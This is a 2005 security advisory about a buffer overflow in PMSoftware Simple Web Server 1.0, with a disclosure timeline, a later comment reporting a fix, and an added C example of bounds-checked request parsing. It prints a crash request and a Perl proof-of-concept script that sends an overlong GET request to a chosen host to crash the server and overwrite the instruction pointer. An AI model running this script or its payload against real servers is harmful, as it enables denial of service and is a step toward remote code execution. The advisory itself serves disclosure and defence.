"Simple Web Server the easy and small way to open an HTTP Web Server"
PMSoftware's Simple Web Server does not perform proper bounds checking when handling normal GET requests. Sending an overlong page or script name causes a buffer overflow, and an attacker can run arbitrary code on the victim's machine.
Credit:
The information has been provided by ERNW Security.
Vulnerable Systems:
* Simple Web Server version 1.0
The following request causes Simple Web Server to crash:
GET /AAAAAA.....AAAA with 260 A's
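An added example, not PMSoftware's code and not part of the original advisory: a bounds-checked request-line parser in C showing the length check whose absence the advisory describes. The function name, the status codes returned and the 250-byte destination size (taken from the buffer[250] comment in the PoC) are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define TARGET_BUF_LEN 250  /* assumed: mirrors the "buffer[250]" note in the PoC */

/* Hypothetical hardened parser for "GET <target> HTTP/x.y".
 * Copies <target> into out and returns an HTTP status:
 * 200 ok, 400 malformed, 414 target too long, 501 method not GET.
 * Never writes more than outsz bytes to out. */
int parse_get_target(const char *line, size_t line_len, char *out, size_t outsz)
{
    static const char method[] = "GET ";
    const size_t mlen = sizeof method - 1;
    const char *start, *end;
    size_t n;

    if (outsz == 0) return 400;
    out[0] = '\0';
    if (line_len < mlen) return 400;
    if (memcmp(line, method, mlen) != 0) return 501;
    start = line + mlen;
    /* Bound the search by the bytes actually received, not by a
       terminator the client controls. */
    end = memchr(start, ' ', line_len - mlen);
    if (end == NULL || end == start || *start != '/') return 400;
    n = (size_t)(end - start);
    /* The missing check: compare the length with the destination size
       BEFORE copying, and reject instead of truncating. */
    if (n >= outsz) return 414;
    memcpy(out, start, n);
    out[n] = '\0';
    return 200;
}

int main(void)
{
    char req[300], path[TARGET_BUF_LEN];
    /* Constructed input: "GET /" + 260 'A' + " HTTP/1.1\n", parsed locally. */
    memcpy(req, "GET /", 5);
    memset(req + 5, 'A', 260);
    memcpy(req + 265, " HTTP/1.1\n", 10);
    printf("status %d\n", parse_get_target(req, 275, path, sizeof path));
    return 0;
}
```

Rejecting with 414 rather than truncating keeps the server from serving a different resource than the one requested.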
Exploit:
#!/usr/bin/perl
# DoS Exploit By mthumann@ernw.de
# Tested against WinXP + SP2
# Remote Buffer Overflow in PMSoftware Simple Web Server 1.0.15
# buffer[250]
use Socket;
print "PMSoftware Simple Web Server Exploit by Michael Thumann \n\n";
if (not $ARGV[0]) {
    print "Usage: swsexploit.pl <host>\n";
    exit;
}
$ip=$ARGV[0];
print "Sending Shellcode to: " . $ip . "\n\n";
my $testcode= "ERNWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB".
"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC".
"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD".
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE".
"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF".
"ABCDEFGHIJAAAA"; #EIP =41414141
my $attack="GET /".$testcode." HTTP/1.1\n" ;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
    die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
    select(S);
    $|=1;
    print $attack;
    my @in=<S>;
    select(STDOUT);
    close(S);
} else { die("Can't connect...\n"); }
Disclosure Timeline:
17 Feb 2005: Vulnerability reported to vendor
28 Feb 2005: 2nd report because the vendor didn't respond
07 Mar 2005: 3rd mail sent to the vendor - vendor didn't respond
18 Apr 2005: Public Disclosure

Subject: PMsoftware Simple Web Server V2.1 has fixed this bug.
Date: 11 Nov. 2007
From: TurtleWax
I checked the author's site and it has V2.1 released currently with this bug and some others fixed.
TurtleWax